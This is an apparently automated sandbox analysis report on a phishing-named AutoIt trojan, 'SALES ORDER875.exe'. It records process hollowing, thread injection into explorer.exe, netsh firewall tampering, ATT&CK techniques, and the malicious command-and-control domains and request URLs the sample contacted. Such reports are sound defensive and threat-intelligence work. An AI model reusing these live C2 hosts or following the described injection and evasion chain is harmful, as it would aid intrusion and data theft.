          Source: explorer.exe, 00000003.00000002.4125666132.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1839441117.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.4125188674.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1839005711.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000003.00000002.4125666132.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1839441117.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.4125666132.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1839441117.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A0698 cpuid 0_2_003A0698
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_003F8195
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003DD27A GetUserNameW,0_2_003DD27A
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003BBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_003BBB6F
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003842DE

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: SALES ORDER875.exeBinary or memory string: WIN_81
          Source: SALES ORDER875.exeBinary or memory string: WIN_XP
          Source: SALES ORDER875.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: SALES ORDER875.exeBinary or memory string: WIN_XPe
          Source: SALES ORDER875.exeBinary or memory string: WIN_VISTA
          Source: SALES ORDER875.exeBinary or memory string: WIN_7
          Source: SALES ORDER875.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_00401204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00401204
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_00401806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00401806
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          1
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          11
          Disable or Modify Tools
          1
          Credential API Hooking
          2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules
          2
          Valid Accounts
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          21
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol1
          Credential API Hooking
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
          Valid Accounts
          2
          Obfuscated Files or Information
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares21
          Input Capture
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation
          1
          DLL Side-Loading
          NTDS215
          System Information Discovery
          Distributed Component Object Model3
          Clipboard Data
          12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
          Process Injection
          1
          Rootkit
          LSA Secrets341
          Security Software Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Valid Accounts
          Cached Domain Credentials12
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Virtualization/Sandbox Evasion
          DCSync3
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation
          Proc Filesystem11
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt612
          Process Injection
          /etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546714 Sample: SALES ORDER875.exe Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 32 www.zoc-marriage.xyz 2->32 34 www.ool-covers76.xyz 2->34 36 10 other IPs or domains 2->36 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 11 other signatures 2->50 11 SALES ORDER875.exe 1 2->11         started        signatures3 48 Performs DNS queries to domains with low reputation 34->48 process4 signatures5 60 Binary is likely a compiled AutoIt script file 11->60 62 Writes to foreign memory regions 11->62 64 Maps a DLL or memory area into another process 11->64 14 svchost.exe 11->14         started        process6 signatures7 66 Modifies the context of a thread in another process (thread injection) 14->66 68 Maps a DLL or memory area into another process 14->68 70 Sample uses process hollowing technique 14->70 72 3 other signatures 14->72 17 explorer.exe 57 1 14->17 injected process8 dnsIp9 28 94950.bodis.com 199.59.243.227, 50002, 80 BODIS-NJUS United States 17->28 30 yegle.net 216.239.32.52, 50003, 80 GOOGLEUS United States 17->30 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Uses netsh to modify the Windows network and firewall settings 17->40 21 netsh.exe 17->21         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54 56 Tries to detect virtualization through RDTSC time measurements 21->56 58 Switches to a custom stack to bypass stack traces 21->58 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SALES ORDER875.exe55%ReversingLabsWin32.Trojan.AutoitInject
          SALES ORDER875.exe100%AviraDR/AutoIt.Gen8
          SALES ORDER875.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://aka.ms/odirmr0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
          https://wns.windows.com/L0%URL Reputationsafe
          https://word.office.com0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
          https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          https://outlook.com_0%URL Reputationsafe
          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://api.msn.com/q0%URL Reputationsafe
          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
          https://aka.ms/Vh5j3k0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          yegle.net
          216.239.32.52
          truefalse
            unknown
            94950.bodis.com
            199.59.243.227
            truetrue
              unknown
              www.pm-22-ns-2.click
              unknown
              unknowntrue
                unknown
                www.yegle.net
                unknown
                unknowntrue
                  unknown
                  www.rkgexg.top
                  unknown
                  unknowntrue
                    unknown
                    www.9net88.net
                    unknown
                    unknowntrue
                      unknown
                      www.lasterdeals.shop
                      unknown
                      unknowntrue
                        unknown
                        www.zoc-marriage.xyz
                        unknown
                        unknowntrue
                          unknown
                          www.ocockbowerlybrawer.cfd
                          unknown
                          unknowntrue
                            unknown
                            www.ool-covers76.xyz
                            unknown
                            unknowntrue
                              unknown
                              www.iscinddocenaemlynne.cfd
                              unknown
                              unknowntrue
                                unknown
                                www.ivglass.xyz
                                unknown
                                unknowntrue
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.yegle.net/ge07/?bb=jzpSmAmxAHuMrBYVYK/iobfyuTkKVe1DkRFizLdS8mEnIcKQ83L44yYAyf2Gtg0WJqSR&AZFdK=5jGt1VUhS4spDnRfalse
                                    unknown
                                    www.9net88.net/ge07/true
                                      unknown
                                      http://www.9net88.net/ge07/?AZFdK=5jGt1VUhS4spDnR&bb=rInKjcPO3O96ojanc4NFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tP8faITl6IDtrue
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://aka.ms/odirmrexplorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.pm-22-ns-2.click/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.ivglass.xyzReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            http://www.giyztm.xyz/ge07/www.iscinddocenaemlynne.cfdexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              http://www.pipagtxcorrelo.xyz/ge07/www.ecurityemployment.todayexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                http://www.lasterdeals.shop/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://excel.office.comexplorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zoc-marriage.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.ocockbowerlybrawer.cfd/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://www.giyztm.xyz/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.ivglass.xyz/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://www.rkgexg.top/ge07/www.ocockbowerlybrawer.cfdexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.f7y2i9fgm.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://www.zoc-marriage.xyz/ge07/www.ivglass.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.ocockbowerlybrawer.cfdexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.giyztm.xyzReferer:explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://www.ithin-ksvodn.xyz/ge07/www.pipagtxcorrelo.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.pipagtxcorrelo.xyz/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://www.yegle.net/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000000.1848448919.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.ool-covers76.xyzexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000003.3105701317.000000000C9BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114249246.000000000C9EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1848448919.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://www.ecurityemployment.today/ge07/explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://wns.windows.com/Lexplorer.exe, 00000003.00000000.1848448919.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://word.office.comexplorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.rkgexg.topexplorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
